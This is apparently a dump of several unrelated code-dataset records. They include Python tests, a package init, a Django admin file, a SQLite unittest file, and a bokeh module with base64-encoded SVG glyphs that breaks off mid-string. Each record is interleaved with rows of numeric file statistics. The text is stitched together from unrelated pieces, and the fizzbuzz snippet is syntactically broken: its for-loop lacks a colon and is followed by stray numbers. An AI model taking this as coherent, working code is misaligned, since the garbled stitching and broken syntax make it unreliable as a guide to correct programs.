assert get_parts_of_url(links[3]) == ('','://','#')
assert get_parts_of_url(links[4]) == ('','://',' ')
assert get_parts_of_url(links[5]) == ('','://','')
| 41.135135 | 138 | 0.644547 | 188 | 1,522 | 5 | 0.170213 | 0.361702 | 0.351064 | 0.398936 | 0.834043 | 0.726596 | 0.701064 | 0.488298 | 0.424468 | 0.356383 | 0 | 0.008909 | 0.11498 | 1,522 | 36 | 139 | 42.277778 | 0.688938 | 0 | 0 | 0.129032 | 0 | 0 | 0.434496 | 0 | 0 | 0 | 0 | 0 | 0.354839 | 1 | 0.064516 | false | 0 | 0.064516 | 0 | 0.129032 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ffcd8a6a665aedb48b75f8e267fd4eb09a5c901a | 568 | py | Python | monitoring_system/utils/__init__.py | NesterukSergey/Rpi_monitoring_study | a2e9431232ea59757b53dcbfdccf998178ed6264 | [
"MIT"
] | 10 | 2020-08-31T19:21:23.000Z | 2022-01-24T22:00:00.000Z | monitoring_system/utils/__init__.py | Skrisss/Raspberry_Pi_monitoring_system | 736c077576ac49775ffd59d59614d9ef97e33f1d | [
"MIT"
] | null | null | null | monitoring_system/utils/__init__.py | Skrisss/Raspberry_Pi_monitoring_system | 736c077576ac49775ffd59d59614d9ef97e33f1d | [
"MIT"
] | 9 | 2021-12-04T10:38:53.000Z | 2022-01-24T22:00:02.000Z | from monitoring_system.utils.json import *
from monitoring_system.utils.csv import write_csv, read_csv
from monitoring_system.utils.get_time import get_time
from monitoring_system.utils.txt import write_txt, read_txt
from monitoring_system.utils.get_serial_number import get_serial_number
from monitoring_system.utils.average import average
from monitoring_system.utils.list_dirs import list_dirs
from monitoring_system.utils.preprocess_cameras import *
from monitoring_system.utils.preprocess_sensors import *
from monitoring_system.utils.preprocess_sensors import *
| 51.636364 | 71 | 0.880282 | 83 | 568 | 5.722892 | 0.240964 | 0.294737 | 0.421053 | 0.526316 | 0.471579 | 0.214737 | 0.214737 | 0.214737 | 0 | 0 | 0 | 0 | 0.073944 | 568 | 10 | 72 | 56.8 | 0.903042 | 0 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ffeeda8b22c1d7b779d9a53c2cb4efdd915d18af | 184 | py | Python | fizzbuzz.py | hoona1011/git-flow-practice | 9d7cdd3794a6e8c9968cd29b84273f5dbf281add | [
"MIT"
] | null | null | null | fizzbuzz.py | hoona1011/git-flow-practice | 9d7cdd3794a6e8c9968cd29b84273f5dbf281add | [
"MIT"
] | null | null | null | fizzbuzz.py | hoona1011/git-flow-practice | 9d7cdd3794a6e8c9968cd29b84273f5dbf281add | [
"MIT"
] | null | null | null | for i in range(1,15+1)
if i%3==0:
print('fizz')
else:
print(i)
5
5
5
5
5
5
15
15
15
| 9.684211 | 22 | 0.277174 | 25 | 184 | 2.04 | 0.52 | 0.196078 | 0.235294 | 0.235294 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0 | 0.272727 | 0.641304 | 184 | 18 | 23 | 10.222222 | 0.5 | 0 | 0 | 0.214286 | 0 | 0 | 0.021858 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.142857 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ffefc5450ba9e766bb390ce894c7b49a9ef55757 | 149 | py | Python | wallarm_api/core/models/graph_data.py | Neraverin/wallarm-api-python | a033cfee28b1648f6bb7d1e531f353929b5d41c1 | [
"Apache-2.0"
] | null | null | null | wallarm_api/core/models/graph_data.py | Neraverin/wallarm-api-python | a033cfee28b1648f6bb7d1e531f353929b5d41c1 | [
"Apache-2.0"
] | null | null | null | wallarm_api/core/models/graph_data.py | Neraverin/wallarm-api-python | a033cfee28b1648f6bb7d1e531f353929b5d41c1 | [
"Apache-2.0"
] | null | null | null | from pydantic import BaseModel
class GraphSummaryMonthly(BaseModel):
requests_count: int
attacks_count: int
blocked_attacks_count: int
| 18.625 | 37 | 0.785235 | 17 | 149 | 6.647059 | 0.647059 | 0.212389 | 0.265487 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.174497 | 149 | 7 | 38 | 21.285714 | 0.918699 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
082e5ede6918060692832d0876b6e1268b52677a | 159 | py | Python | someblog/admin.py | Kwpolska/django-someblog | 9b12c59785bbe7b58312f3a844f4712b6d2b3d76 | [
"BSD-3-Clause"
] | null | null | null | someblog/admin.py | Kwpolska/django-someblog | 9b12c59785bbe7b58312f3a844f4712b6d2b3d76 | [
"BSD-3-Clause"
] | null | null | null | someblog/admin.py | Kwpolska/django-someblog | 9b12c59785bbe7b58312f3a844f4712b6d2b3d76 | [
"BSD-3-Clause"
] | null | null | null | from django.contrib import admin
from someblog.models import Post, Tag, Author
admin.site.register(Post)
admin.site.register(Tag)
admin.site.register(Author)
| 22.714286 | 45 | 0.811321 | 24 | 159 | 5.375 | 0.5 | 0.209302 | 0.395349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08805 | 159 | 6 | 46 | 26.5 | 0.889655 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
f2c5347d1d210458285a8f53f5da1598625434a3 | 384 | py | Python | scgen/modules/Disruption.py | supermihi/scgen | 844144b8fb59de6a81c305ebcf0e39cf5af7c01d | [
"MIT"
] | 1 | 2020-07-29T13:48:32.000Z | 2020-07-29T13:48:32.000Z | scgen/modules/Disruption.py | supermihi/scgen | 844144b8fb59de6a81c305ebcf0e39cf5af7c01d | [
"MIT"
] | 2 | 2020-11-17T20:27:57.000Z | 2021-01-11T15:41:10.000Z | scgen/modules/Disruption.py | supermihi/scgen | 844144b8fb59de6a81c305ebcf0e39cf5af7c01d | [
"MIT"
] | 1 | 2020-11-16T12:59:40.000Z | 2020-11-16T12:59:40.000Z | from scgen.modules.BaseModule import BaseModule
from scgen.helpers.JointGeneration import generateJointly
class Disruption(BaseModule):
name = "disruption"
def __init__(self, forElements, distributions, elementList, moduleList, distributionsProvider, **additionalSettings):
super().__init__(forElements, distributions, elementList, moduleList, distributionsProvider) | 48 | 121 | 0.809896 | 33 | 384 | 9.181818 | 0.636364 | 0.059406 | 0.231023 | 0.29703 | 0.435644 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111979 | 384 | 8 | 122 | 48 | 0.888563 | 0 | 0 | 0 | 1 | 0 | 0.025974 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f2c60106fdbab06512780f1af5ae2d9dda42809a | 7,395 | py | Python | assets/misc/SQLite_Docker_Python_Challenge/test.py | oliviapy960825/oliviapy960825.github.io | 7a07fd0887e5854b0b92e4cc8e20ff1fd2219fde | [
"CC-BY-3.0"
] | null | null | null | assets/misc/SQLite_Docker_Python_Challenge/test.py | oliviapy960825/oliviapy960825.github.io | 7a07fd0887e5854b0b92e4cc8e20ff1fd2219fde | [
"CC-BY-3.0"
] | null | null | null | assets/misc/SQLite_Docker_Python_Challenge/test.py | oliviapy960825/oliviapy960825.github.io | 7a07fd0887e5854b0b92e4cc8e20ff1fd2219fde | [
"CC-BY-3.0"
] | null | null | null | import sqlite3
import unittest
from webservice2 import *
import warnings
import datetime
#warnings.simplefilter("ignore", ResourceWarning)
class UnitTest(unittest.TestCase):
def setUp(self):
self.conn = sqlite3.connect(":memory:")
c = self.conn.cursor()
def test_creating_table(self):
sql_create_positions_table = """ CREATE TABLE IF NOT EXISTS positions (
name text PRIMARY KEY,
description text
); """
sql_create_interns_table = """CREATE TABLE IF NOT EXISTS interns (
id integer PRIMARY KEY,
last_name text NOT NULL,
first_name text NOT NULL,
position_applied text NOT NULL,
school text NOT NULL,
program text NOT NULL,
date_of_entry text NOT NULL,
FOREIGN KEY (position_applied) REFERENCES positions (name)
ON UPDATE NO ACTION
);"""
#c.execute(sql_create_positions_table)
# create projects table
create_table(self.conn, sql_create_positions_table)
# create tasks table
create_table(self.conn, sql_create_interns_table)
self.conn.commit()
res = self.conn.execute("SELECT name FROM sqlite_master WHERE type='table';")
names=res.fetchall()
#result=self.assertEqual(name[0],"positions") or self.assertEqual(name[1],"interns")
#print (str(result))
self.assertTrue(names[0], "positions")
self.assertTrue(names[1], "interns")
#Creating table tested
# create tables
# Returns True or False.
def test_inserting_position(self):
position=("Software Development Intern", "This position is for software development intern")
if self.conn is not None:
c = self.conn.cursor()
sql_create_positions_table = """ CREATE TABLE IF NOT EXISTS positions (
name text PRIMARY KEY,
description text
); """
create_table(self.conn, sql_create_positions_table)
create_position(self.conn, position)
self.conn.commit()
else:
print("Error! cannot create the database connection.")
c.execute("SELECT name from positions LIMIT 1")
result = c.fetchone()
self.assertTrue(result[0], "Software Development Intern")
def test_inserting_intern(self):
intern_1=("A","B","Software Development Intern","GWU","Data Analytics",datetime.datetime.now())
intern_2=("C","D","Data Science Intern","GWU","Data Analytics",datetime.datetime.now())
sql_create_positions_table = """ CREATE TABLE IF NOT EXISTS positions (
name text PRIMARY KEY,
description text
); """
sql_create_interns_table = """CREATE TABLE IF NOT EXISTS interns (
id integer PRIMARY KEY,
last_name text NOT NULL,
first_name text NOT NULL,
position_applied text NOT NULL,
school text NOT NULL,
program text NOT NULL,
date_of_entry text NOT NULL,
FOREIGN KEY (position_applied) REFERENCES positions (name)
ON UPDATE NO ACTION
);"""
#c.execute(sql_create_positions_table)
if self.conn is not None:
c = self.conn.cursor()
# create projects table
create_table(self.conn, sql_create_positions_table)
# create tasks table
create_table(self.conn, sql_create_interns_table)
position=("Software Development Intern", "This position is for software development intern")
create_position(self.conn, position)
create_intern(self.conn, intern_1)
create_intern(self.conn, intern_2)
self.conn.commit()
else:
print("Error! cannot create the database connection.")
c.execute("SELECT first_name from interns")
result = c.fetchall()
self.assertTrue(len(result), 1)
self.assertTrue(result[0], "B")
def test_inserting_intern_api(self):
#intern_1=("A","B","Software Development Intern","GWU","Data Analytics",datetime.datetime.now())
#intern_2=("C","D","Data Science Intern","GWU","Data Analytics",datetime.datetime.now())
interns=[{'Applicant Last Name':'A','Applicant First Name':'B','Position Applied For':'Software Development Intern','Applicant School':'GWU','Applicant Degree Program':'CS'},{'Applicant Last Name':'C','Applicant First Name':'D','Position Applied For':'Data Analytics Intern','Applicant School':'GWU','Applicant Degree Program':'CS'}]
sql_create_positions_table = """ CREATE TABLE IF NOT EXISTS positions (
name text PRIMARY KEY,
description text
); """
sql_create_interns_table = """CREATE TABLE IF NOT EXISTS interns (
id integer PRIMARY KEY,
last_name text NOT NULL,
first_name text NOT NULL,
position_applied text NOT NULL,
school text NOT NULL,
program text NOT NULL,
date_of_entry text NOT NULL,
FOREIGN KEY (position_applied) REFERENCES positions (name)
ON UPDATE NO ACTION
);"""
#c.execute(sql_create_positions_table)
if self.conn is not None:
c = self.conn.cursor()
# create projects table
create_table(self.conn, sql_create_positions_table)
# create tasks table
create_table(self.conn, sql_create_interns_table)
position=("Software Development Intern", "This position is for software development intern")
create_position(self.conn, position)
create_interns_api(self.conn, interns)
self.conn.commit()
else:
print("Error! cannot create the database connection.")
c.execute("SELECT first_name from interns")
result = c.fetchall()
self.assertTrue(len(result), 1)
self.assertTrue(result[0], "B")
def tearDown(self):
self.conn.close()
if __name__ == '__main__':
unittest.main()
| 44.281437 | 341 | 0.515889 | 715 | 7,395 | 5.183217 | 0.155245 | 0.058284 | 0.053427 | 0.068268 | 0.763896 | 0.745008 | 0.745008 | 0.745008 | 0.719104 | 0.706152 | 0 | 0.004311 | 0.404057 | 7,395 | 166 | 342 | 44.548193 | 0.836624 | 0.084381 | 0 | 0.75 | 0 | 0 | 0.570033 | 0 | 0 | 0 | 0 | 0 | 0.060345 | 1 | 0.051724 | false | 0 | 0.043103 | 0 | 0.103448 | 0.025862 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4b7498f5965e56dc6e5abe06865e425e346013eb | 9,607 | py | Python | css.py | rodluger/starry_gp_app | 0f4b50bb124ea045a4e6e26a6bf32ef93b10885a | [
"MIT"
] | 1 | 2020-08-25T01:25:27.000Z | 2020-08-25T01:25:27.000Z | css.py | rodluger/starry_gp_app | 0f4b50bb124ea045a4e6e26a6bf32ef93b10885a | [
"MIT"
] | null | null | null | css.py | rodluger/starry_gp_app | 0f4b50bb124ea045a4e6e26a6bf32ef93b10885a | [
"MIT"
] | null | null | null | from bokeh.models import Div
from plasma import plasma
__all__ = ["svg_mu", "svg_nu", "style"]
# SVG: Greek mu
svg_mu = lambda: Div(
text="""
<img src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+CjwhLS0gQ3JlYXRlZCB3aXRoIElua3NjYXBlIChodHRwOi8vd3d3Lmlua3NjYXBlLm9yZy8pIC0tPgoKPHN2ZwogICB4bWxuczpkYz0iaHR0cDovL3B1cmwub3JnL2RjL2VsZW1lbnRzLzEuMS8iCiAgIHhtbG5zOmNjPSJodHRwOi8vY3JlYXRpdmVjb21tb25zLm9yZy9ucyMiCiAgIHhtbG5zOnJkZj0iaHR0cDovL3d3dy53My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5zIyIKICAgeG1sbnM6c3ZnPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIKICAgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIgogICB4bWxuczpzb2RpcG9kaT0iaHR0cDovL3NvZGlwb2RpLnNvdXJjZWZvcmdlLm5ldC9EVEQvc29kaXBvZGktMC5kdGQiCiAgIHhtbG5zOmlua3NjYXBlPSJodHRwOi8vd3d3Lmlua3NjYXBlLm9yZy9uYW1lc3BhY2VzL2lua3NjYXBlIgogICB3aWR0aD0iNDAwIgogICBoZWlnaHQ9IjQwMCIKICAgaWQ9InN2ZzQ2MTEiCiAgIHNvZGlwb2RpOnZlcnNpb249IjAuMzIiCiAgIGlua3NjYXBlOnZlcnNpb249IjAuOTIuNCAoNWRhNjg5YzMxMywgMjAxOS0wMS0xNCkiCiAgIHZlcnNpb249IjEuMCIKICAgc29kaXBvZGk6ZG9jbmFtZT0iR3JlZWtfbGNfbXUuc3ZnIj4KICA8ZGVmcwogICAgIGlkPSJkZWZzNDYxMyIgLz4KICA8c29kaXBvZGk6bmFtZWR2aWV3CiAgICAgaWQ9ImJhc2UiCiAgICAgcGFnZWNvbG9yPSIjZmZmZmZmIgogICAgIGJvcmRlcmNvbG9yPSIjNjY2NjY2IgogICAgIGJvcmRlcm9wYWNpdHk9IjEuMCIKICAgICBncmlkdG9sZXJhbmNlPSIxMDAwMCIKICAgICBndWlkZXRvbGVyYW5jZT0iMTAiCiAgICAgb2JqZWN0dG9sZXJhbmNlPSIxLjYiCiAgICAgaW5rc2NhcGU6cGFnZW9wYWNpdHk9IjAuMCIKICAgICBpbmtzY2FwZTpwYWdlc2hhZG93PSIyIgogICAgIGlua3NjYXBlOnpvb209IjAuNyIKICAgICBpbmtzY2FwZTpjeD0iODUuOTA5MTkiCiAgICAgaW5rc2NhcGU6Y3k9IjE5MC42MTg4MyIKICAgICBpbmtzY2FwZTpkb2N1bWVudC11bml0cz0icHgiCiAgICAgaW5rc2NhcGU6Y3VycmVudC1sYXllcj0ibGF5ZXIxIgogICAgIGlua3NjYXBlOm9iamVjdC1iYm94PSJ0cnVlIgogICAgIGlua3NjYXBlOm9iamVjdC1wb2ludHM9InRydWUiCiAgICAgaW5rc2NhcGU6b2JqZWN0LW5vZGVzPSJ0cnVlIgogICAgIGlua3NjYXBlOmdyaWQtcG9pbnRzPSJ0cnVlIgogICAgIGlua3NjYXBlOndpbmRvdy13aWR0aD0iMTkyMCIKICAgICBpbmtzY2FwZTp3aW5kb3ctaGVpZ2h0PSIxMDE3IgogICAgIGlua3NjYXBlOndpbmRvdy14PSItOCIKICAgICBpbmtzY2FwZTp3aW5kb3cteT0iLTgiCiAgICAgd2lkdGg9IjQwMHB4IgogICAgIGhlaWdodD0iNDAwcHgiCiAgICAgc2hvd2dyaWQ9ImZhbHNlIgogICAgIGlua3NjYXBlOndpbmRvdy1tYXhpbWl6ZWQ9IjEiIC8+CiAgPG1ldGFkYXRhCiAgICAgaWQ9Im1ldGFkYXRhNDYxNiI+CiAgICA8cmRmOlJERj4KICAgICAgPGNjOldvcmsKICAgICAgICAgcmRmOmFib3V0PSIiPgogICAgICAgIDxkYzpmb3JtYXQ+aW1hZ2Uvc3ZnK3htbDwvZGM6Zm9ybWF0PgogICAgICAgIDxkYzp0eXBlCiAgICAgICAgICAgcmRmOnJlc291cmNlPSJodHRwOi8vcHVybC5vcmcvZGMvZGNtaXR5cGUvU3RpbGxJbWFnZSIgLz4KICAgICAgPC9jYzpXb3JrPgogICAgPC9yZGY6UkRGPgogIDwvbWV0YWRhdGE+CiAgPGcKICAgICBpbmtzY2FwZTpsYWJlbD0iTGF5ZXIgMSIKICAgICBpbmtzY2FwZTpncm91cG1vZGU9ImxheWVyIgogICAgIGlkPSJsYXllcjEiCiAgICAgdHJhbnNmb3JtPSJ0cmFuc2xhdGUoLTI1Ni42Nzk4LC01MzEuNzk2MykiPgogICAgPGcKICAgICAgIGFyaWEtbGFiZWw9Is68IgogICAgICAgc3R5bGU9ImZvbnQtc3R5bGU6bm9ybWFsO2ZvbnQtd2VpZ2h0Om5vcm1hbDtsaW5lLWhlaWdodDowJTtmb250LWZhbWlseTonVGltZXMgTmV3IFJvbWFuJzt0ZXh0LWFsaWduOnN0YXJ0O3RleHQtYW5jaG9yOnN0YXJ0O2ZpbGw6IzAwMDAwMDtmaWxsLW9wYWNpdHk6MTtzdHJva2U6bm9uZTtzdHJva2Utd2lkdGg6MXB4O3N0cm9rZS1saW5lY2FwOmJ1dHQ7c3Ryb2tlLWxpbmVqb2luOm1pdGVyO3N0cm9rZS1vcGFjaXR5OjEiCiAgICAgICBpZD0idGV4dDU1NDAiPgogICAgICA8cGF0aAogICAgICAgICBkPSJtIDQ4NS43MzExNCw4MDcuOTQ1OCBxIC0zNS4zNTE1NiwzNy44OTA2MyAtNjEuNTIzNDQsMzcuODkwNjMgLTE2Ljc5Njg3LDAgLTMxLjI1LC0xMi44OTA2MyB2IDEwLjM1MTU2IHEgMCwxNy45Njg3NSA1LjQ2ODc1LDM2LjEzMjgyIDYuMjUsMjAuMTE3MTggNi4yNSwyNi41NjI1IDAsOC45ODQzNyAtNS42NjQwNiwxNC44NDM3NSAtNS42NjQwNiw1Ljg1OTM3IC0xNC4wNjI1LDUuODU5MzcgLTguNTkzNzUsMCAtMTMuNjcxODcsLTYuODM1OTQgLTUuMDc4MTMsLTYuODM1OTMgLTUuMDc4MTMsLTE2LjQwNjI1IDAsLTcuMDMxMjUgNS4wNzgxMywtMjUuMzkwNjIgNS44NTkzNywtMjAuMzEyNSA1Ljg1OTM3LC0zOS40NTMxMyBWIDY2MS40NjE0MyBoIDMyLjIyNjU2IHYgMTE1LjgyMDMxIHEgMCwxNy41NzgxMiAyLjkyOTY5LDI1Ljc4MTI1IDMuMTI1LDguMjAzMTIgMTAuNzQyMTksMTMuNDc2NTYgNy44MTI1LDUuMDc4MTMgMTcuNTc4MTIsNS4wNzgxMyAxNy4zODI4MiwwIDQ1LjExNzE5LC0yMy44MjgxMyBWIDY2MS40NjE0MyBoIDMyLjQyMTg4IHYgMTM1Ljc0MjE4IHEgMCwxNy4xODc1IDMuNTE1NjIsMjMuODI4MTMgMy41MTU2Myw2LjQ0NTMxIDExLjkxNDA2LDYuNDQ1MzEgMTMuMjgxMjUsMCAxNy4xODc1LC0yNS45NzY1NiBoIDcuMDMxMjUgcSAtMy43MTA5Myw0NC4zMzU5NCAtMzcuNSw0NC4zMzU5NCAtMTQuNjQ4NDMsMCAtMjQuNDE0MDYsLTkuNzY1NjMgLTkuNTcwMzEsLTkuOTYwOTQgLTEwLjE1NjI1LC0yOC4xMjUgeiIKICAgICAgICAgc3R5bGU9ImZvbnQtc2l6ZTo0MDBweDtsaW5lLWhlaWdodDoxLjI1O3RleHQtYWxpZ246Y2VudGVyO3RleHQtYW5jaG9yOm1pZGRsZSIKICAgICAgICAgaWQ9InBhdGg4MTQiIC8+CiAgICA8L2c+CiAgPC9nPgo8L3N2Zz4K"
width=20, height=20></img>
""",
css_classes=["custom-slider-title"],
)
# SVG: Greek sigma
svg_sigma = lambda: Div(
text="""
<img src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+CjwhLS0gQ3JlYXRlZCB3aXRoIElua3NjYXBlIChodHRwOi8vd3d3Lmlua3NjYXBlLm9yZy8pIC0tPgo8c3ZnCiAgIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIKICAgeG1sbnM6Y2M9Imh0dHA6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL25zIyIKICAgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIgogICB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIgogICB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciCiAgIHhtbG5zOnNvZGlwb2RpPSJodHRwOi8vc29kaXBvZGkuc291cmNlZm9yZ2UubmV0L0RURC9zb2RpcG9kaS0wLmR0ZCIKICAgeG1sbnM6aW5rc2NhcGU9Imh0dHA6Ly93d3cuaW5rc2NhcGUub3JnL25hbWVzcGFjZXMvaW5rc2NhcGUiCiAgIHdpZHRoPSIxMjUwIgogICBoZWlnaHQ9IjI1MDAiCiAgIGlkPSJzdmcyIgogICBzb2RpcG9kaTp2ZXJzaW9uPSIwLjMyIgogICBpbmtzY2FwZTp2ZXJzaW9uPSIwLjQ2ZGV2K2RldmVsIgogICB2ZXJzaW9uPSIxLjAiCiAgIHNvZGlwb2RpOmRvY25hbWU9IlRpbWVzIE5ldyBSb21hbiBHcmVlayBzbWFsbCBsZXR0ZXIgc2lnbWEuc3ZnIgogICBpbmtzY2FwZTpvdXRwdXRfZXh0ZW5zaW9uPSJvcmcuaW5rc2NhcGUub3V0cHV0LnN2Zy5pbmtzY2FwZSI+CiAgPGRlZnMKICAgICBpZD0iZGVmczQiIC8+CiAgPHNvZGlwb2RpOm5hbWVkdmlldwogICAgIGlkPSJiYXNlIgogICAgIHBhZ2Vjb2xvcj0iI2ZmZmZmZiIKICAgICBib3JkZXJjb2xvcj0iIzY2NjY2NiIKICAgICBib3JkZXJvcGFjaXR5PSIxLjAiCiAgICAgaW5rc2NhcGU6cGFnZW9wYWNpdHk9IjAuMCIKICAgICBpbmtzY2FwZTpwYWdlc2hhZG93PSIyIgogICAgIGlua3NjYXBlOnpvb209IjAuMDg3NSIKICAgICBpbmtzY2FwZTpjeD0iLTUzNy43NzgyMyIKICAgICBpbmtzY2FwZTpjeT0iLTU0LjQwNjEzNCIKICAgICBpbmtzY2FwZTpkb2N1bWVudC11bml0cz0icHgiCiAgICAgaW5rc2NhcGU6Y3VycmVudC1sYXllcj0ibGF5ZXIxIgogICAgIHNob3dncmlkPSJmYWxzZSIKICAgICBpbmtzY2FwZTpzaG93cGFnZXNoYWRvdz0iZmFsc2UiCiAgICAgaW5rc2NhcGU6d2luZG93LXdpZHRoPSIxMjgwIgogICAgIGlua3NjYXBlOndpbmRvdy1oZWlnaHQ9IjEwMDMiCiAgICAgaW5rc2NhcGU6d2luZG93LXg9IjAiCiAgICAgaW5rc2NhcGU6d2luZG93LXk9IjAiIC8+CiAgPG1ldGFkYXRhCiAgICAgaWQ9Im1ldGFkYXRhNyI+CiAgICA8cmRmOlJERj4KICAgICAgPGNjOldvcmsKICAgICAgICAgcmRmOmFib3V0PSIiPgogICAgICAgIDxkYzpmb3JtYXQ+aW1hZ2Uvc3ZnK3htbDwvZGM6Zm9ybWF0PgogICAgICAgIDxkYzp0eXBlCiAgICAgICAgICAgcmRmOnJlc291cmNlPSJodHRwOi8vcHVybC5vcmcvZGMvZGNtaXR5cGUvU3RpbGxJbWFnZSIgLz4KICAgICAgPC9jYzpXb3JrPgogICAgPC9yZGY6UkRGPgogIDwvbWV0YWRhdGE+CiAgPGcKICAgICBpbmtzY2FwZTpsYWJlbD0iTGl2ZWxsbyAxIgogICAgIGlua3NjYXBlOmdyb3VwbW9kZT0ibGF5ZXIiCiAgICAgaWQ9ImxheWVyMSIKICAgICB0cmFuc2Zvcm09InRyYW5zbGF0ZSg1MzIuMTQyODgsMTM1OS4wNjY0KSI+CiAgICA8cGF0aAogICAgICAgc3R5bGU9ImZvbnQtc2l6ZToyMDQ4cHg7Zm9udC1zdHlsZTpub3JtYWw7Zm9udC13ZWlnaHQ6bm9ybWFsO3RleHQtYWxpZ246Y2VudGVyO3RleHQtYW5jaG9yOm1pZGRsZTtmaWxsOiMwMDAwMDA7ZmlsbC1vcGFjaXR5OjE7ZmlsbC1ydWxlOm5vbnplcm87c3Ryb2tlOm5vbmU7c3Ryb2tlLXdpZHRoOjM7c3Ryb2tlLWxpbmVjYXA6YnV0dDtzdHJva2UtbGluZWpvaW46cm91bmQ7c3Ryb2tlLW1pdGVybGltaXQ6MjtzdHJva2UtZGFzaG9mZnNldDowO3N0cm9rZS1vcGFjaXR5OjE7Zm9udC1mYW1pbHk6VGltZXMgTmV3IFJvbWFuIgogICAgICAgZD0iTSA1ODMuODU3MTIsLTM0Ny41NjY0MSBMIDU4My44NTcxMiwtMjAxLjU2NjQxIEwgMTkzLjg1NzEyLC0yMDEuNTY2NDEgQyAyNzkuMTg5NjksLTE1Mi44OTkwMiAzNDguODU2MjksLTkxLjM5OTA4IDQwMi44NTcxMiwtMTcuMDY2NDA2IEMgNDU2Ljg1NjE4LDU3LjI2NzQzOCA0ODMuODU2MTUsMTM2LjEwMDY5IDQ4My44NTcxMiwyMTkuNDMzNTkgQyA0ODMuODU2MTUsMzI4LjEwMDUgNDQxLjAyMjg2LDQxOC4xMDA0MSAzNTUuMzU3MTIsNDg5LjQzMzU5IEMgMjY5LjY4OTcsNTYwLjc2NjkzIDE3Mi41MjMxMyw1OTYuNDMzNTcgNjMuODU3MTE3LDU5Ni40MzM1OSBDIC02NC44MDk5NjQsNTk2LjQzMzU3IC0xNzUuODA5ODUsNTQ1LjkzMzYyIC0yNjkuMTQyODgsNDQ0LjkzMzU5IEMgLTM2Mi40NzYzMywzNDMuOTMzODIgLTQwOS4xNDI5NSwyMjYuNDMzOTQgLTQwOS4xNDI4OCw5Mi40MzM1OTQgQyAtNDA5LjE0Mjk1LC0yLjIzMjUwMjMgLTM4NC42NDI5OCwtODUuODk5MDg1IC0zMzUuNjQyODgsLTE1OC41NjY0MSBDIC0yODYuNjQzMDgsLTIzMS4yMzIyNyAtMjI5LjY0MzEzLC0yODAuODk4ODkgLTE2NC42NDI4OCwtMzA3LjU2NjQxIEMgLTk5LjY0MzI2MywtMzM0LjIzMjE3IC0xMS44MTAwMTcsLTM0Ny41NjU0OSA5OC44NTcxMTcsLTM0Ny41NjY0MSBMIDU4My44NTcxMiwtMzQ3LjU2NjQxIHogTSAxMjYuODU3MTIsLTIwMS41NjY0MSBM